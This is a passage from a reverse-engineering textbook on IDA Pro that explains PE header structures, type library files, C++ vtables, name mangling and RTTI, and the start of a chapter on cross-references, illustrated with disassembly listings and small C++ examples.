typical programs make no direct reference to their own file headers. Thus

there is no reason for the analyzer to apply structure templates to the headers.

After conducting some research on the format of a PE binary, you

will learn that a PE file begins with an MS-DOS header structure named

IMAGE_DOS_HEADER. Further, data contained within the IMAGE_DOS_HEADER

points to the location of an IMAGE_NT_HEADERS structure, which details the

memory layout of the PE binary. Choosing to load the PE headers, you

might see something similar to the following unformatted data disassem-

bly. Readers familiar with the PE file structure may recognize the familiar

MS-DOS magic value MZ as the first two bytes in the file.

Datatypes and Data Structures 153

HEADER:00400000 __ImageBase db 4Dh ; M

HEADER:00400001 db 5Ah ; Z

HEADER:00400002 db 90h ; É

HEADER:00400003 db 0

HEADER:00400004 db 3

HEADER:00400005 db 0

HEADER:00400006 db 0

HEADER:00400007 db 0

HEADER:00400008 db 4

HEADER:00400009 db 0

HEADER:0040000A db 0

HEADER:0040000B db 0

HEADER:0040000C db 0FFh

HEADER:0040000D db 0FFh

HEADER:0040000E db 0

HEADER:0040000F db 0

As this file is formatted here, you would need some PE file reference doc-

umentation to help you make sense of each of the data bytes. By using struc-

ture templates, IDA can format these bytes as an IMAGE_DOS_HEADER, making the

data far more useful. The first step is to add the standard IMAGE_DOS_HEADER as

detailed above (you could add the IMAGE_NT_HEADERS structure while you are at

it). The second step is to convert the bytes beginning at __ImageBase into an

IMAGE_DOS_HEADER structure using EditStruct Var (ALT-Q). This results in the

reformatted display shown here:

HEADER:00400000 __ImageBase IMAGE_DOS_HEADER <5A4Dh, 90h, 3, 0, 4, 0, 0FFFFh, 0, 0B8h, \

HEADER:00400000 0, 0, 0, 40h, 0, 0, 0, 0, 0, 80h>

HEADER:00400040 db 0Eh

As you can see, the first 64 (0x40) bytes in the file have been collapsed

into a single data structure, with the type noted in the disassembly. Unless

you possess encyclopedic knowledge of this particular structure, though,

the meaning of each field may remain somewhat cryptic. We can take this

operation one step further, however, by expanding the structure. When a

structured data item is expanded, each field is annotated with its corre-

sponding field name from the structure definition. Collapsed structures

can be expanded using the plus key (+) on the numeric keypad. The final

version of the listing follows:

HEADER:00400000 __ImageBase dw 5A4Dh ; e_magic

HEADER:00400000 dw 90h ; e_cblp

HEADER:00400000 dw 3 ; e_cp

HEADER:00400000 dw 0 ; e_crlc

HEADER:00400000 dw 4 ; e_cparhdr

HEADER:00400000 dw 0 ; e_minalloc

HEADER:00400000 dw 0FFFFh ; e_maxalloc

HEADER:00400000 dw 0 ; e_ss

HEADER:00400000 dw 0B8h ; e_sp

HEADER:00400000 dw 0 ; e_csum

HEADER:00400000 dw 0 ; e_ip

154 Chapter 8

HEADER:00400000 dw 0 ; e_cs

HEADER:00400000 dw 40h ; e_lfarlc

HEADER:00400000 dw 0 ; e_ovno

HEADER:00400000 dw 4 dup(0) ; e_res

HEADER:00400000 dw 0 ; e_oemid

HEADER:00400000 dw 0 ; e_oeminfo

HEADER:00400000 dw 0Ah dup(0) ; e_res2

HEADER:00400000 Xdd 80h ; e_lfanew

HEADER:00400040 db 0Eh

Unfortunately, the fields of IMAGE_DOS_HEADER do not possess particularly

meaningful names, so we may need to consult a PE file reference to remind

ourselves that the e_lfanew field X indicates the file offset at which an

IMAGE_NT_HEADERS structure can be found. Applying all of the previous steps

to create an IMAGE_NT_HEADER at address 00400080 (0x80 bytes into the database)

yields the nicely formatted structure shown in part here:

HEADER:00400080 dd 4550h ; Signature

HEADER:00400080 dw 14Ch ; FileHeader.Machine

HEADER:00400080 Xdw 5 ; FileHeader.NumberOfSections

HEADER:00400080 dd 4789ADF1h ; FileHeader.TimeDateStamp

HEADER:00400080 dd 1400h ; FileHeader.PointerToSymbolTable

HEADER:00400080 dd 14Eh ; FileHeader.NumberOfSymbols

HEADER:00400080 dw 0E0h ; FileHeader.SizeOfOptionalHeader

HEADER:00400080 dw 307h ; FileHeader.Characteristics

HEADER:00400080 dw 10Bh ; OptionalHeader.Magic

HEADER:00400080 db 2 ; OptionalHeader.MajorLinkerVersion

HEADER:00400080 db 38h ; OptionalHeader.MinorLinkerVersion

HEADER:00400080 dd 800h ; OptionalHeader.SizeOfCode

HEADER:00400080 dd 800h ; OptionalHeader.SizeOfInitializedData

HEADER:00400080 dd 200h ; OptionalHeader.SizeOfUninitializedData

HEADER:00400080 dd 1000h ; OptionalHeader.AddressOfEntryPoint

HEADER:00400080 dd 1000h ; OptionalHeader.BaseOfCode

HEADER:00400080 dd 2000h ; OptionalHeader.BaseOfData

HEADER:00400080 Ydd 400000h ; OptionalHeader.ImageBase

Fortunately for us, the field names in this case are somewhat more mean-

ingful. We quickly see that the file consists of five sections X and should be

loaded into memory at virtual address 00400000 Y. Expanded structures can

be returned to their collapsed state using the minus key (–) on the keypad.

IDA TIL Files

All datatype and function prototype information in IDA is stored in TIL files.

IDA ships with type library information for many major compilers and APIs

stored in the <IDADIR>/til directory. The Types window (ViewOpen sub-

viewType Libraries) lists currently loaded .til files and is used to load addi-

tional .til files that you may wish to use. Type libraries are loaded automatically

based on attributes of the binary discovered during the analysis phase. Under

ideal circumstances, most users will never need to deal with .til files directly.

Datatypes and Data Structures 155

Loading New TIL Files

In some cases, IDA may fail to detect that a specific compiler was used to

build a binary, perhaps because the binary has undergone some form of

obfuscation. When this happens, you may load additional .til files by pressing

the INSERT key within the Types window and selecting the desired .til files.

When a new .til file is loaded, all structure definitions contained in the file

are added to the list of standard structures, and type information is applied

for any functions within the binary that have matching prototypes in the

newly loaded .til file. In other words, when IDA gains new knowledge about

the nature of a function, it automatically applies that new knowledge.

Sharing TIL Files

IDA also makes use of .til files to store any custom structure definitions that

you create manually in the Structures window or through parsing C header

files. Such structures are stored in a dedicated .til file associated with the data-

base in which they were created. This file shares the base name of the database

and has a .til extension. For a database named some_file.idb, the associated type

library file would be some_file.til. Under normal circumstances you will never

see this file unless you happen to have the database open in IDA. Recall that

an .idb file is actually an archive file (similar to a .tar file) used to hold the com-

ponents of a database when they are not in use. When a database is opened,

the component files (the .til file being one of them) are extracted as working

files for IDA.

A discussion regarding how to share .til files across databases can be

found at http://www.hex-rays.com/forum/viewtopic.php?f=6&t=986.4 Two tech-

niques are mentioned. The first technique is somewhat unofficial and involves

copying the .til file from an open database into your IDA til directory from

which it can be opened, in any other database, via the Types window. A more

official way to extract the custom type information from a database is to gen-

erate an IDC script that can be used to re-create the custom structures in any

other database. Such a script can be generated using the FileProduce File

Dump Typeinfo to IDC File command. However, unlike the first technique,

this technique dumps only the structures listed in the Structures window,

which may not include all structures parsed from C header files (whereas the

.til file-copying technique will).

Hex-Rays also provides a standalone tool, named tilib, for creating .til

files outside of IDA. The utility is available as a .zip file for registered users via

the Hex-Rays IDA download page. Installation is as simple as extracting the

.zip file contents into <IDADIR>. The tilib utility may be used to list the con-

tents of existing .til files or create new .til files by parsing C (not C++) header

files. The following command would list the contents of the Visual Studio 6

type library:

C:\Program Files\IdaPro>tilib -l til\pc\vc6win.til

4. This link is accessible to registered users only.

156 Chapter 8

Creating a new .til file involves naming the header file to be parsed and

the .til file to be created. Command line options allow you to specify addi-

tional include file directories or, alternatively, previously parsed .til files in

order to resolve any dependencies contained in your header file. The follow-

ing command creates a new .til file containing the declaration of ch8_struct.

The resulting .til file must be moved into <IDADIR>/til before IDA can make

use of it.

C:\Program Files\IdaPro>tilib -c -hch8_struct.h ch8.til

The tilib utility contains a substantial number of additional capabilities,

some of which are detailed in the README file included with the tilib distri-

bution, and others of which are briefly detailed by running tilib with no argu-

ments. Prior to version 6.1, tilib is distributed only as a Windows executable;

however, the .til files that it generates are compatible with all versions of IDA.

C++ Reversing Primer

C++ classes are the object-oriented extensions of C structs, so it is somewhat

logical to wrap up our discussion of data structures with a review of the fea-

tures of compiled C++ code. C++ is sufficiently complex that detailed cover-

age of the topic is beyond the scope of this book. Here we attempt to cover

the highlights and a few of the differences between Microsoft’s Visual C++

and GNU’s g++.

An important point to remember is that a solid, fundamental under-

standing of the C++ language will assist you greatly in understanding com-

piled C++. Object-oriented concepts such as inheritance and polymorphism

are difficult enough to learn well at the source level. Attempting to dive into

these concepts at the assembly level without understanding them at the

source level will certainly be an exercise in frustration.

The this Pointer

The this pointer is a pointer available in all nonstatic C++ member functions.

Whenever such a function is called, this is initialized to point to the object

used to invoke the function. Consider the following functions calls:

//object1, object2, and *p_obj are all the same type.

object1.member_func();

object2.member_func();

p_obj->member_func();

In the three calls to member_func, this takes on the values &object1,

&object2, and p_obj, respectively. It is easiest to view this as a hidden first

parameter passed in to all nonstatic member functions. As discussed in Chap-

ter 6, Microsoft Visual C++ utilizes the thiscall calling convention and passes

this in the ECX register. The GNU g++ compiler treats this exactly as if it was

Datatypes and Data Structures 157

the first (leftmost) parameter to nonstatic member functions and pushes the

address of the object used to invoke the function as the topmost item on the

stack prior to calling the function.

From a reverse engineering point of view, the moving of an address into

the ECX register immediately prior to a function call is a probable indicator

of two things. First, the file was compiled using Visual C++. Second, the func-

tion is a member function. When the same address is passed to two or more

functions, we can conclude that those functions all belong to the same class

hierarchy.

Within a function, the use of ECX prior to initializing it implies that the

caller must have initialized ECX and is a possible sign that the function is a

member function (though the function may simply use the fastcall calling

convention). Further, when a member function is observed to pass this to

additional functions, those functions can be inferred to be members of the

same class as well.

For code compiled using g++, calls to member functions stand out some-

what less. However, any function that does not take a pointer as its first argu-

ment can certainly be ruled out as a member function.

Virtual Functions and Vtables

Virtual functions provide the means for polymorphic behavior in C++ pro-

grams. For each class (or subclass through inheritance) that contains virtual

functions, the compiler generates a table containing pointers to each virtual

function in the class. Such tables are called vtables. Furthermore, every class

that contains virtual functions is given an additional data member whose pur-

pose is to point to the appropriate vtable at runtime. This member is typically

referred to as a vtable pointer and is allocated as the first data member within

the class. When an object is created at runtime, its vtable pointer is set to

point at the appropriate vtable. When that object invokes a virtual function,

the correct function is selected by performing a lookup in the object’s vtable.

Thus, vtables are the underlying mechanism that facilitates runtime resolu-

tion of calls to virtual functions.

A few examples may help to clarify the use of vtables. Consider the fol-

lowing C++ class definitions:

class BaseClass {

public:

BaseClass();

virtual void vfunc1() = 0;

virtual void vfunc2();

virtual void vfunc3();

virtual void vfunc4();

private:

int x;

int y;

};

158 Chapter 8

class SubClass : public BaseClass {

public:

SubClass();

virtual void vfunc1();

virtual void vfunc3();

virtual void vfunc5();

private:

int z;

};

In this case, SubClass inherits from BaseClass. BaseClass contains four vir-

tual functions, while SubClass contains five (four from BaseClass plus the new

vfunc5). Within BaseClass, vfunc1 is a pure virtual function by virtue of the use of

=0 in its declaration. Pure virtual functions have no implementation in their

declaring class and must be overridden in a subclass before the class is consid-

ered concrete. In other words, there is no function named BaseClass::vfunc1,

and until a subclass provides an implementation, no objects can be instanti-

ated. SubClass provides such an implementation, so SubClass objects can be

created.

At first glance BaseClass appears to contain two data members and Sub-

Class three data members. Recall, however, that any class that contains virtual

functions, either explicitly or because they are inherited, also contains a vtable

pointer. As a result, instantiated BaseClass objects actually have three data

members, while instantiated SubClass objects have four data members. In

each case, the first data member is the vtable pointer. Within SubClass, the

vtable pointer is actually inherited from BaseClass rather than being intro-

duced specifically for SubClass. Figure 8-14 shows a simplified memory layout

in which a single SubClass object has been dynamically allocated. During the

creation of the object, the compiler ensures that the new object’s vtable

pointer points to the correct vtable (SubClass’s in this case).

Figure 8-14: A simple vtable layout

BaseClass *bc = new SubClass();

heap data

read-only data

(.rdata/.rodata)

BaseClass vtable

&purecall

&BaseClass::vfunc2

&BaseClass::vfunc3

&BaseClass::vfunc4

SubClass vtable

&SubClass::vfunc1

&BaseClass::vfunc2

&BaseClass::vfunc4

&SubClass::vfunc3

&SubClass::vfunc5

p_vftable

Datatypes and Data Structures 159

Note that the vtable for SubClass contains two pointers to functions

belonging to BaseClass (BaseClass::vfunc2 and BaseClass::vfunc4). This is

because SubClass does not override either of these functions and instead

inherits them from BaseClass. Also shown is the typical handling of pure vir-

tual function entries. Because there is no implementation for the pure virtual

function BaseClass::vfunc1, no address is available to store in the BaseClass

vtable slot for vfunc1. In such cases, compilers insert the address of an error-

handling function, often dubbed purecall, which in theory should never be

called but which will usually abort the program in the event that it somehow

is called.

One consequence of the presence of a vtable pointer is that you must

account for it when you manipulate the class within IDA. Recall that C++

classes are an extension of C structures. Therefore, you may choose to make

use of IDA’s structure definition features to define the layout of C++ classes.

In the case of classes that contain virtual functions, you must remember to

include a vtable pointer as the first field within the class. Vtable pointers

must also be accounted for in the total size of an object. This is most appar-

ent when observing the dynamic allocation of an object using the new5 opera-

tor, where the size value passed to new includes the space consumed by all

explicitly declared fields in the class (and any superclasses) as well as any

space required for a vtable pointer.

In the following example a SubClass object is created dynamically, and

its address saved in a BaseClass pointer. The pointer is then passed to a func-

tion (call_vfunc), which uses the pointer to call vfunc3.

void call_vfunc(BaseClass *b) {

b->vfunc3();

}

int main() {

BaseClass *bc = new SubClass();

call_vfunc(bc);

}

Since vfunc3 is a virtual function, the compiler must ensure that

SubClass::vfunc3 is called in this case because the pointer points to a Sub-

Class object. The following disassembled version of call_vfunc demonstrates

how the virtual function call is resolved:

.text:004010A0 call_vfunc proc near

.text:004010A0

.text:004010A0 b = dword ptr 8

.text:004010A0

.text:004010A0 push ebp

.text:004010A1 mov ebp, esp

.text:004010A3 mov eax, [ebp+b]

.text:004010A6 Xmov edx, [eax]

5. The new operator is used for dynamic memory allocation in C++ in much the same way that

malloc is used in C (though new is built into the C++ language, where malloc is merely a standard

library function).

160 Chapter 8

.text:004010A8 mov ecx, [ebp+b]

.text:004010AB Ymov eax, [edx+8]

.text:004010AE Zcall eax

.text:004010B0 pop ebp

.text:004010B1 retn

.text:004010B1 call_vfunc endp

The vtable pointer is read from the structure at X and saved in the EDX

address of SubClass’s vtable. At Y, the vtable is indexed to read the third

pointer (the address of SubClass::vfunc3 in this case) into the EAX register.

Finally, at Z, the virtual function is called.

Note that the vtable indexing operation at Y looks very much like a

structure reference operation. In fact, it is no different, and it is possible to

define a structure to represent the layout of a class’s vtable and then use the

defined structure to make the disassembly more readable, as shown here:

00000000 SubClass_vtable struc ; (sizeof=0x14)

00000000 vfunc1 dd ?

00000004 vfunc2 dd ?

00000008 vfunc3 dd ?

0000000C vfunc4 dd ?

00000010 vfunc5 dd ?

00000014 SubClass_vtable ends

This structure allows the vtable reference operation to be reformatted as

follows:

.text:004010AB mov eax, [edx+SubClass_vtable.vfunc3]

The Object Life Cycle

An understanding of the mechanism by which objects are created and

destroyed can help to reveal object hierarchies and nested object relation-

ships as well as quickly identify class constructor and destructor functions.6

For global and statically allocated objects, constructors are called during

program startup and prior to entry into the main function. Constructors for

stack-allocated objects are invoked at the point the object comes into scope

within the function in which it is declared. In many cases, this will be immedi-

ately upon entry to the function in which it is declared. However, when an

object is declared within a block statement, its constructor is not invoked

until that block is entered, if it is entered at all. When an object is allocated

dynamically in the program heap, its creation is a two-step process. In the

first step, the new operator is invoked to allocate the object’s memory. In the

second step, the constructor is invoked to initialize the object. A major differ-

ence between Microsoft’s Visual C++ and GNU’s g++ is that Visual C++ ensures

that the result of new is not null prior to invoking the constructor.

6. A class constructor function is an initialization function that is invoked automatically when an

object is created. A corresponding destructor is optional and would be called when an object is no

longer in scope or similar.

Datatypes and Data Structures 161

When a constructor executes, the following sequence of actions takes

place:

1. If the class has a superclass, the superclass constructor is invoked.

2. If the class has any virtual functions, the vtable pointer is initialized to

point to the class’s vtable. Note that this may overwrite a vtable pointer

that was initialized in the superclass, which is exactly the desired behavior.

3. If the class has any data members that are themselves objects, then the

constructor for each such data member is invoked.

4. Finally, the code-specific constructor is executed. This is the code repre-

senting the C++ behavior of the constructor specified by the programmer.

Constructors do not specify a return type; however, constructors gener-

ated by Microsoft Visual C++ actually return this in the EAX register. Regard-

less, this is a Visual C++ implementation detail and does not permit C++

programmers to access the returned value.

Destructors are called in essentially the reverse order. For global and static

objects, destructors are called by cleanup code that is executed after the main

function terminates. Destructors for stack-allocated objects are invoked as the

objects go out of scope. Destructors for heap-allocated objects are invoked

via the delete operator immediately before the memory allocated to the

object is released.

The actions performed by destructors mimic those performed by con-

structors, with the exception that they are performed in roughly reverse

order.

1. If the class has any virtual functions, the vtable pointer for the object is

restored to point to the vtable for the associated class. This is required in

case a subclass had overwritten the vtable pointer as part of its creation

process.

2. The programmer-specified code for the destructor executes.

3. If the class has any data members that are themselves objects, the

destructor for each such member is executed.

4. Finally, if the object has a superclass, the superclass destructor is called.

By understanding when superclass constructors and destructors are

called, it is possible to trace an object’s inheritance hierarchy through the

chain of calls to its related superclass functions. A final point regarding vta-

bles relates to how they are referenced within programs. There are only two

circumstances in which a class’s vtable is referenced directly, within the class

constructor(s) and destructor. When you locate a vtable, you can utilize IDA’s

data cross-referencing capabilities (see Chapter 9) to quickly locate all con-

structors and destructors for the associated class.

162 Chapter 8

Name Mangling

Also called name decoration, name mangling is the mechanism C++ compilers

use to distinguish among overloaded7 versions of a function. In order to

generate unique names for overloaded functions, compilers decorate the

function name with additional characters used to encode various pieces of

information about the function. Encoded information typically describes the

return type of the function, the class to which the function belongs, and the

parameter sequence (type and order) required to call the function.

Name mangling is a compiler implementation detail for C++ programs

and as such is not part of the C++ language specification. Not unexpectedly,

compiler vendors have developed their own, often-incompatible conventions

for name mangling. Fortunately, IDA understands the name-mangling con-

ventions employed by Microsoft Visual C++ and GNU g++ as well as a few

.text:00401050 ; protected: __thiscall SubClass::SubClass(void)

Xtext:00401050 ??0SubClass@@IAE@XZ proc near

...

.text:004010DC Ycall ??0SubClass@@IAE@XZ ; SubClass::SubClass(void)

Likewise, displaying demangled names as names results in the following:

X.text:00401050 protected: __thiscall SubClass::SubClass(void) proc near

...

.text:004010DC Ycall SubClass::SubClass(void)

where X is representative of the first line of a disassembled function and Y is

representative of a call to that function.

7. In C++, function overloading allows programmers to use the same name for several functions.

The only requirement is that each version of an overloaded function must differ from every other

version in the sequence and/or quantity of parameter types that the function receives. In other

words, each function prototype must be unique.

Figure 8-15: Demangled name

display options

other compilers. By default, when a

mangled name is encountered within

a program, IDA displays the demangled

equivalent as a comment anywhere the

name appears in the disassembly. IDA’s

name-demangling options are selected

using the dialog shown in Figure 8-15,

which is accessed using Options

Demangled Names.

The three principal options control

whether demangled names are displayed as

comments, whether the names themselves

are demangled, or whether no demangling

is performed at all. Displaying demangled

names as comments results in a display sim-

ilar to the following:

Datatypes and Data Structures 163

The Assume GCC v3.x names checkbox is used to distinguish between

the mangling scheme used in g++ version 2.9.x and that used in g++ versions

3.x and later. Under normal circumstances, IDA should automatically detect

the naming conventions in use in g++-compiled code. The Setup short

names and Setup long names buttons offer fine-grained control over the for-

matting of demangled names with a substantial number of options that are

documented in IDA’s help system.

Because mangled names carry so much information regarding the signa-

ture of each function, they reduce the time required to understand the num-

ber and types of parameters passed into a function. When mangled names

are available within a binary, IDA’s demangling capability instantly reveals

the parameter types and return types for all functions whose names are man-

gled. In contrast, for any function that does not utilize a mangled name, you

must conduct time-consuming analysis of the data flowing into and out of the

function in order to determine the signature of the function.

Runtime Type Identification

C++ provides operators that allow for runtime determination (typeid) and

checking (dynamic_cast) of an object’s datatype. To facilitate these opera-

tions, C++ compilers must embed type information within a program binary

and implement procedures whereby the type of a polymorphic object can be

determined with certainty regardless of the type of the pointer that may be

dereferenced to access the object. Unfortunately, as with name mangling,

Runtime Type Identification (RTTI) is a compiler implementation detail

rather than a language issue, and there is no standard means by which com-

pilers implement RTTI capabilities.

We will take brief look at the similarities and differences between the

RTTI implementations of Microsoft Visual C++ and GNU g++. Specifically,

the only details presented here concern how to locate RTTI information

and, from there, how to learn the name of class to which that information

pertains. Readers desiring more detailed discussion of Microsoft’s RTTI

implementation should consult the references listed at the end of this chap-

ter. In particular, the references detail how to traverse a class’s inheritance

hierarchy, including how to trace that hierarchy when multiple inheritance

is being used.

Consider the following simple program, which makes use of poly-

morphism:

class abstract_class {

public:

virtual int vfunc() = 0;

};

class concrete_class : public abstract_class {

public:

concrete_class();

int vfunc();

};

164 Chapter 8

void print_type(abstract_class *p) {

cout << typeid(*p).name() << endl;

}

int main() {

abstract_class *sc = new concrete_class();

print_type(sc);

}

The print_type function must correctly print the type of the object

being pointed to by the pointer p. In this case, it is trivial to realize that

“concrete_class” must be printed based on the fact that a concrete_class

object is created in the main function. The question we answer here is: How

does print_type, and more specifically typeid, know what type of object p is

pointing to?

The answer is surprisingly simple. Since every polymorphic object con-

tains a pointer to a vtable, compilers leverage that fact by co-locating class-

type information with the class vtable. Specifically, the compiler places a

pointer immediately prior to the class vtable. This pointer points to a struc-

ture that contains information used to determine the name of the class that

owns the vtable. In g++ code, this pointer points to a type_info structure,

which contains a pointer to the name of the class. In Visual C++, the pointer

points to a Microsoft RTTICompleteObjectLocator structure, which in turn con-

tains a pointer to a TypeDescriptor structure. The TypeDescriptor structure

contains a character array that specifies the name of the polymorphic class.

It is important to realize that RTTI information is required only in C++

programs that use the typeid or dynamic_cast operator. Most compilers pro-

vide options to disable the generation of RTTI in binaries that do not require

it; therefore, you should not be surprised if RTTI information ever happens

to be missing.

Inheritance Relationships

If you dig deep enough into some RTTI implementations, you will find that

it is possible to unravel inheritance relationships, though you must under-

stand the compiler’s particular implementation of RTTI in order to do so.

Also, RTTI may not be present when a program does not utilize the typeid or

dynamic_cast operators. Lacking RTTI information, what techniques can be

employed to determine inheritance relationships among C++ classes?

The simplest method of determining an inheritance hierarchy is to

observe the chain of calls to superclass constructors that are called when an

object is created. The single biggest hindrance to this technique is the use

of inline8 constructors, the use of which makes it impossible to understand

that a superclass constructor has in fact been called.

8. In C/C++ programs a function declared as inline is treated as a macro by the compiler, and

the code for the function is expanded in place of an explicit function call. Since the presence of

an assembly language call statement is a dead giveaway that a function is being called, the use of

inline functions tends to hide the fact that a function is being used.

Datatypes and Data Structures 165

An alternative means for determining inheritance relationships involves

the analysis and comparison of vtables. For example, in comparing the vta-

bles shown in Figure 8-14, we note that the vtable for SubClass contains two

of the same pointers that appear in the vtable for BaseClass. We can easily

conclude that BaseClass and SubClass must be related in some way, but

which one is the base class and which one is the subclass? In such cases we

can apply the following guidelines, singly or in combination, in an attempt

to understand the nature of their relationship.

zWhen two vtables contain the same number of entries, the two corre-

sponding classes may be involved in an inheritance relationship.

zWhen the vtable for class X contains more entries than the vtable for

class Y, class X may be a subclass of class Y.

zWhen the vtable for class X contains entries that are also found in the

vtable for class Y, then one of the following relationships must exist: X is

a subclass of Y, Y is a subclass of X, or X and Y are both subclasses of a

common superclass Z.

zWhen the vtable for class X contains entries that are also found in the

vtable for class Y and the vtable for class X contains at least one purecall

entry that is not also present in the corresponding vtable entry for class

Y, then class Y is a subclass of class X.

While the list above is by no means all-inclusive, we can use these

guidelines to deduce the relationship between BaseClass and SubClass

in Figure 8-14. In this case, the last three rules all apply, but the last rule

specifically leads us to conclude, based on vtable analysis alone, that SubClass

inherits from BaseClass.

C++ Reverse Engineering References

For further reading on the topic of reverse engineering compiled C++, check

out these excellent references:

zIgor Skochinsky’s article “Reversing Microsoft Visual C++ Part II: Classes,

Methods and RTTI,” available at http://www.openrce.org/articles/full_view/23.

zPaul Vincent Sabanal and Mark Vincent Yason’s paper “Reversing C++,”

available at http://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/

Paper/bh-dc-07-Sabanal_Yason-WP.pdf.

While many of the details in each of these articles apply specifically to

programs compiled using Microsoft Visual C++, many of the concepts apply

equally to programs compiled using other C++ compilers.

166 Chapter 8

Summary

You can expect to encounter complex datatypes in all but the most trivial

programs. Understanding how data within complex data structures is accessed

and knowing how to recognize clues to the layout of those complex data

structures is an essential reverse engineering skill. IDA provides a wide vari-

ety of features designed specifically to address the need to deal with complex

data structures. Familiarity with these features will greatly enhance your abil-

ity to comprehend what data is being manipulated and spend more time

understanding how and why that data is being manipulated.

In the next chapter, we round out our discussion of IDA’s basic capabili-

ties with a discussion of cross-references and graphing before moving on to

the more advanced aspects of IDA usage that set it apart from other reverse

engineering tools.

JMP

EBP

SUB

CROSS-REFERENCES

AND GRAPHING

Some of the more common questions asked

while reverse engineering a binary are along

the lines of “Where is this function called from?”

and “What functions access this data?” These and other

similar questions seek to catalog the references to and

from various resources in a program. Two examples

serve to show the usefulness of such questions.

Consider the case in which you have located a function containing a stack-

allocated buffer that can be overflowed, possibly leading to exploitation of

the program. Since the function may be buried deep within a complex appli-

cation, your next step might be to determine exactly how the function can be

reached. The function is useless to you unless you can get it to execute. This

leads to the question “What functions call this vulnerable function?” as well

as additional questions regarding the nature of the data that those functions

168 Chapter 9

may pass to the vulnerable function. This line of reasoning must continue as

you work your way back up potential call chains to find one that you can

influence to properly exploit the overflow that you have discovered.

In another case, consider a binary that contains a large number of ASCII

strings, at least one of which you find suspicious, such as “Executing Denial

of Service attack!” Does the presence of this string indicate that the binary

actually performs a Denial of Service attack? No, it simply indicates that the

binary happens to contain that particular ASCII sequence. You might infer

that the message is displayed somehow just prior to launching an attack; how-

ever, you need to find the related code in order to verify your suspicions.

Here the answer to the question “Where is this string referenced?” would

help you to quickly track down the program location(s) that make use of the

string. From there, perhaps it can assist you in locating any actual Denial of

Service attack code.

IDA helps to answer these types of questions through its extensive cross-

referencing features. IDA provides a number of mechanisms for displaying

and accessing cross-reference data, including graph-generation capabilities

that provide a highly visual representation of the relationships between code

and data. In this chapter we discuss the types of cross-reference information

that IDA makes available, the tools for accessing cross-reference data, and

how to interpret that data.

Cross-References

We begin our discussion by noting that cross-references within IDA are often

referred to simply as xrefs. Within this text, we will use xref only where it is

used to refer to the content of an IDA menu item or dialog. In all other cases

we will stick to the term cross-reference.

There are two basic categories of cross-references in IDA: code cross-ref-

erences and data cross-references. Within each category, we will detail several

different types of cross-references. Associated with each cross-reference is

the notion of a direction. All cross-references are made from one address

to another address. The from and to addresses may be either code or data

addresses. If you are familiar with graph theory, you may choose to think of

addresses as nodes in a directed graph and cross-references as the edges in

that graph. Figure 9-1 provides a quick refresher on graph terminology. In

this simple graph, three nodes X are connected by two directed edges Y.

Figure 9-1: Basic graph components

Note that nodes may also be referred to as vertices. Directed edges are

drawn using arrows to indicate the allowed direction of travel across the

.text:080489DA jz error 

.text:080489DC push 0 .text:08048A18 error: mov eax, edx 



Cross-References and Graphing 169

edge. In Figure 9-1, it is possible to travel from the upper node to either of

the lower nodes, but it is not possible to travel from either of the lower nodes

to the upper node.

Code cross-references are a very important concept, as they facilitate

IDA’s generation of control flow graphs and function call graphs, each of which

we discuss later in the chapter.

Before we dive into the details of cross-references, it is useful to under-

stand how IDA displays cross-reference information in a disassembly listing.

Figure 9-2 shows the header line for a disassembled function (sub_401000)

containing a cross-reference as a regular comment (right side of the figure).

Figure 9-2: A basic cross-reference

The text CODE XREF indicates that this is a code cross-reference rather than

a data cross-reference (DATA XREF). An address follows, _main+2A in this case,

indicating the address from which the cross-reference originates. Note that

this is a more descriptive form of address than .text:0040154A, for example.

While both forms represent the same program location, the format used in

the cross-reference offers the additional information that the cross-reference

is being made from within the function named _main, specifically 0x2A (42)

bytes into the _main function. An up or down arrow will always follow the

address, indicating the relative direction to the referencing location. In Fig-

ure 9-2, the down arrow indicates that _main+2A lies at a higher address than

sub_401000, and thus you would need to scroll down to reach it. Similarly, an

up arrow indicates that a referencing location lies at a lower memory address,

requiring that you scroll up to reach it. Finally, every cross-reference com-

ment contains a single-character suffix to identify the type of cross-reference

that is being made. Each suffix is described later as we detail all of IDA’s

cross-reference types.

Code Cross-References

A code cross-reference is used to indicate that an instruction transfers or

may transfer control to another instruction. The manner in which instruc-

tions transfer control is referred to as a flow within IDA. IDA distinguishes

among three basic flow types: ordinary, jump, and call. Jump and call flows

are further divided according to whether the target address is a near or far

address. Far addresses are encountered only in binaries that make use of seg-

mented addresses. In the discussion that follows, we make use of the disas-

sembled version of the following program:

int read_it; //integer variable read in main

int write_it; //integer variable written 3 times in main

int ref_it; //integer variable whose address is taken in main

void callflow() {} //function called twice from main

170 Chapter 9

int main() {

int *p = &ref_it; //results in an "offset" style data reference

*p = read_it; //results in a "read" style data reference

write_it = *p; //results in a "write" style data reference

callflow(); //results in a "call" style code reference

if (read_it == 3) { //results in "jump" style code reference

write_it = 2; //results in a "write" style data reference

}

else { //results in an "jump" style code reference

write_it = 1; //results in a "write" style data reference

}

callflow(); //results in an "call" style code reference

}

The program contains operations that will exercise all of IDA’s cross-

referencing features, as noted in the comment text.

An ordinary flow is the simplest flow type, and it represents sequential

flow from one instruction to another. This is the default execution flow for

all nonbranching instructions such as ADD. There are no special display indi-

cators for ordinary flows other than the order in which instructions are listed

in the disassembly. If instruction A has an ordinary flow to instruction B, then

instruction B will immediately follow instruction A in the disassembly listing.

In the following listing, every instruction other than X and Y has an associ-

ated ordinary flow to its immediate successor:

.text:00401010 _main proc near

.text:00401010

.text:00401010 p = dword ptr -4

.text:00401010

.text:00401010 push ebp

.text:00401011 mov ebp, esp

.text:00401013 push ecx

.text:00401014 `mov [ebp+p], offset ref_it

.text:0040101B mov eax, [ebp+p]

.text:0040101E ^mov ecx, read_it

.text:00401024 mov [eax], ecx

.text:00401026 mov edx, [ebp+p]

.text:00401029 mov eax, [edx]

.text:0040102B _mov write_it, eax

.text:00401030 Zcall callflow

.text:00401035 ^cmp read_it, 3

.text:0040103C jnz short loc_40104A

.text:0040103E _mov write_it, 2

.text:00401048 Xjmp short loc_401054

\ .text:0040104A ; -------------------------------------------------------------

.text:0040104A

.text:0040104A loc_40104A: ]; CODE XREF: _main+2CÇj

.text:0040104A _mov write_it, 1

.text:00401054

.text:00401054 loc_401054: ]; CODE XREF: _main+38Çj

.text:00401054 Zcall callflow

.text:00401059 xor eax, eax

Cross-References and Graphing 171

.text:0040105B mov esp, ebp

.text:0040105D pop ebp

.text:0040105E Yretn

.text:0040105E _main endp

Listing 9-1: Cross-reference sources and targets

Instructions used to invoke functions, such as the x86 call instructions at

Z, are assigned a call flow, indicating transfer of control to the target func-

